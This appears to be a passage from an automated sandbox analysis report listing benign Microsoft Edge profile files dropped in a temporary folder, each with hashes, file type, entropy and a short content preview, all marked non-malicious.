                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............dJ.3...W....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\arbitration_service_config.json

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (3852), with CRLF line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):11417
                                                                                                                                                              Entropy (8bit):5.237554345326078
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:192:dH4vrmORnBtW4PoiUDNaxvR5FCHFcoaSbqGEDu:dH4vrmonPW4jR3GaSbqGEDu
                                                                                                                                                              MD5:DF790948C5A7B5DD19D033FE6C793868
                                                                                                                                                              SHA1:0C4A681E07505CA84997CE78FEEE1F0D88CB8E2A
                                                                                                                                                              SHA-256:CB4049061A6A78013D20CC4AB396BEF4F6C35306887BE76765EED4E51EEE702D
                                                                                                                                                              SHA-512:251C3B5DE5452E2F40C648BDB2E3D1CE2315DD4DFFAF4B4E5E08528DBAAB80535F1A82E183A65AB7DCA0C2926AE5D6B61F06DB390D0E3B8D8E77E826B21042CB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\b41b11d1-833a-41cd-aeef-18d0b252f4d3.tmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1
                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):261
                                                                                                                                                              Entropy (8bit):5.284425935411061
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFSlAEq1qLTwi23fQr/Hrl2KLlVEFSmJN9+q2PqLTwi23fQr/HrK+IFUv:koPfwZC1LsomJOv8wZC23FUv
                                                                                                                                                              MD5:75919257B38AA1AC7554A3776E0F9541
                                                                                                                                                              SHA1:9C39A60296A26221C376F212A6C9C66577C166A2
                                                                                                                                                              SHA-256:05EED9C8911E49C5E414A0243B0BFCDBA2F4C0255FFEB8DB215A091A690612D7
                                                                                                                                                              SHA-512:1EFD96326D8656989FFC76B96F96E824C704431A8E48695370BB5F9E34B6AA681ADE8DC144390902B625E24AC9C708F31A65A25A5C6FC3E86E33A018F729172C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:22.019 1d88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db since it was missing..2024/11/21-05:27:22.042 1d88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata\000001.dbtmp

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):184
                                                                                                                                                              Entropy (8bit):3.7064843374216494
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:G0XttkJcsRwI9tkJcsIap3mEaXe/tlfmo1cgtfmEbQJkZt/fmoG:G0XtqcsqcpS3m9XOPmQ1mdkZt3mh
                                                                                                                                                              MD5:B35D474DF6A64D3841ECDF798DBE93FF
                                                                                                                                                              SHA1:DD4C3D2FDC5997B6DF5FB619420125F8D12D5449
                                                                                                                                                              SHA-256:924C5DED0B3D90B90AE8D7EC72CF1FCBEDF69402A2DF3302E462495D47D6BD1D
                                                                                                                                                              SHA-512:C4CFAEFB6DC71762ABEB055240B9D64F7EC573BA0FD165277DEF2658B8D605B78EEEE37092840731AA687CEFEF55341595A08CBD3871E32D02182F8EFE82159F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... ..'i..................21_.....B....................33_......-.t.................21_......'..................33_.....

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata\CURRENT (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16
                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata\LOG

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):279
                                                                                                                                                              Entropy (8bit):5.257615727799289
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:6:HEFS1jAEq1qLTwi23fQr/Hrzs52KLlVEFSvdX9+q2PqLTwi23fQr/HrzAdIFUv:ko1VfwZCs9LsoOv8wZC9FUv
                                                                                                                                                              MD5:FFA578AFBE829BB717633BB6F135AA4E
                                                                                                                                                              SHA1:8ADB0FCA31C24F578A23F10467EBF230D4525C28
                                                                                                                                                              SHA-256:4C005C5C7728A811CB5CA5000FA39C89305B26058FBC44F0D4A556DB861EAEC0
                                                                                                                                                              SHA-512:6A79E3CE2D0D6BD305844487BDD4BC3C69C44DA9E778BAEDDAA028A2733C564B37D4EF5C1B106330EC820B5CF945588689815C63D989FD137A2BF1BFE37F904F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:2024/11/21-05:27:21.993 1d88 Creating DB C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata since it was missing..2024/11/21-05:27:22.016 1d88 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata/MANIFEST-000001.

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Default\shared_proto_db\metadata\MANIFEST-000001

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):41
                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Last Version

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):13
                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:117.0.2045.47

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Local State (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1372
                                                                                                                                                              Entropy (8bit):5.5443902513238
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrt1+/emJFyX8x9WwgyikOJdXmuBuwBwja9IENhlA+X7QQRCYfYg:YuBqDPafuJM8vmZRBzB4iIelA+EB0
                                                                                                                                                              MD5:385BE2D3EAEE8D782BB104CBC41056E5
                                                                                                                                                              SHA1:513716501759B5EC3ECAC0E60662E8F59F708AB4
                                                                                                                                                              SHA-256:1C4DE1B12E00DEE53ECD26D2C8F18BB2C17A5E4403A30F6A0A24834CF3321388
                                                                                                                                                              SHA-512:847306E2F352B18F14D586A893872EF8E3BDAAD016A15274C832DBF8D907154975F2816B5BDD9138E2C131F1920C2E9A8080E51F788DEB2AA30CD753D4FEF4E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"profile":{"info_cache":{},"profile_counts_reported":"13376658440579494","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1732184840"},"user_experien

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Local State~RF2e17c.TMP (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1372
                                                                                                                                                              Entropy (8bit):5.5443902513238
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrt1+/emJFyX8x9WwgyikOJdXmuBuwBwja9IENhlA+X7QQRCYfYg:YuBqDPafuJM8vmZRBzB4iIelA+EB0
                                                                                                                                                              MD5:385BE2D3EAEE8D782BB104CBC41056E5
                                                                                                                                                              SHA1:513716501759B5EC3ECAC0E60662E8F59F708AB4
                                                                                                                                                              SHA-256:1C4DE1B12E00DEE53ECD26D2C8F18BB2C17A5E4403A30F6A0A24834CF3321388
                                                                                                                                                              SHA-512:847306E2F352B18F14D586A893872EF8E3BDAAD016A15274C832DBF8D907154975F2816B5BDD9138E2C131F1920C2E9A8080E51F788DEB2AA30CD753D4FEF4E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"profile":{"info_cache":{},"profile_counts_reported":"13376658440579494","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1732184840"},"user_experien

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Local State~RF2e1cb.TMP (copy)

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:JSON data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1372
                                                                                                                                                              Entropy (8bit):5.5443902513238
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrt1+/emJFyX8x9WwgyikOJdXmuBuwBwja9IENhlA+X7QQRCYfYg:YuBqDPafuJM8vmZRBzB4iIelA+EB0
                                                                                                                                                              MD5:385BE2D3EAEE8D782BB104CBC41056E5
                                                                                                                                                              SHA1:513716501759B5EC3ECAC0E60662E8F59F708AB4
                                                                                                                                                              SHA-256:1C4DE1B12E00DEE53ECD26D2C8F18BB2C17A5E4403A30F6A0A24834CF3321388
                                                                                                                                                              SHA-512:847306E2F352B18F14D586A893872EF8E3BDAAD016A15274C832DBF8D907154975F2816B5BDD9138E2C131F1920C2E9A8080E51F788DEB2AA30CD753D4FEF4E1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC+iLm2Zr7aQKM/QMbOv3p0EAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAABP3bqCLIIKULZltKi9naM/NsvjHziFuEObTMT1vXQENAAAAAAOgAAAAAIAACAAAABtMxtfCiQ0HI8W/DJehMIUsnPu/LG+d5TdDuLQSLjn5DAAAAC6rCjpeKykHLu1xImseQaYTi3WjJT27iNlfniGO7Co3Jrxmxi3LVrts6ZkzhjRGSVAAAAAHDkHlxhbJAEPhcLOFI09zETSMTMr9eCqhMrME9N2qmM6xEFhdzzUGADkw/sDe37nc9mKZvhc9lVMimzveK0Jng=="},"profile":{"info_cache":{},"profile_counts_reported":"13376658440579494","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":false},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1732184840"},"user_experien

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\Nurturing\campaign_history

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):20480
                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\ShaderCache\data_0

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.01057775872642915
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsFl:/F
                                                                                                                                                              MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                              SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                              SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                              SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\ShaderCache\data_1

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012096502606932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsEllllkXl:/M/6
                                                                                                                                                              MD5:259E7ED5FB3C6C90533B963DA5B2FC1B
                                                                                                                                                              SHA1:DF90EABDA434CA50828ABB039B4F80B7F051EC77
                                                                                                                                                              SHA-256:35BB2F189C643DCF52ECF037603D104035ECDC490BF059B7736E58EF7D821A09
                                                                                                                                                              SHA-512:9D401053AC21A73863B461B0361DF1A17850F42FD5FC7A77763A124AA33F2E9493FAD018C78CDFF63CA10F6710E53255CE891AD6EC56EC77D770C4630F274933
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\ShaderCache\data_2

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.011852361981932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsHlDll:/H
                                                                                                                                                              MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                              SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                              SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                              SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\ShaderCache\data_3

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:data
                                                                                                                                                              Category:modified
                                                                                                                                                              Size (bytes):8192
                                                                                                                                                              Entropy (8bit):0.012340643231932763
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:MsGl3ll:/y
                                                                                                                                                              MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                              SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                              SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                              SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                              C:\Users\user\AppData\Local\Temp\chr6BC.tmp\ShaderCache\index

                                                                                                                                                              Download File
                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):262512
                                                                                                                                                              Entropy (8bit):9.553120663130604E-4
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:3:LsNl+nl/:Ls3+nt
                                                                                                                                                              MD5:99234E126218656E2223089DB2CA0C26
                                                                                                                                                              SHA1:C90AD9DF4F2206FE4632643FE7BA3C7CEEE0633D
